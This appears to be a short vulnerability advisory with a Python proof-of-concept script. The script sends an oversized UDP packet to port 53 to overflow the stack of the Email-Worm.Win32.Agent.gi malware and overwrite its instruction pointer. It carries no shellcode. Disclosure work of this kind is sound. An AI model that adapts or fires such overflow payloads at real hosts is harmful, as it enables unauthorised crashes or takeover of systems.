Email-Worm.Win32.Agent.gi Remote Stack Buffer Overflow

Email-Worm.Win32.Agent.gi malware suffers from a remote stack buffer overflow vulnerability.

Exploit/PoC:

from socket import socket, AF_INET, SOCK_DGRAM

MALWARE_HOST = "x.x.x.x"
PORT = 53

def doit():
    # UDP socket aimed at the malware's listener
    s = socket(AF_INET, SOCK_DGRAM)
    s.connect((MALWARE_HOST, PORT))

    # R for EIP
    # (bytes literals so send() works on Python 3 as well as Python 2)
    PACKOLA = b"A" * 324 + b"R" * 8

    s.send(PACKOLA)
    s.close()

    print("Email-Worm.Win32.Agent.gi / Remote UDP Buffer Overflow (SYSTEM)")
    print("MD5: 74e65773735f977185f6a09f1472ea46")
    print("By Malvuln")

if __name__ == "__main__":
    doit()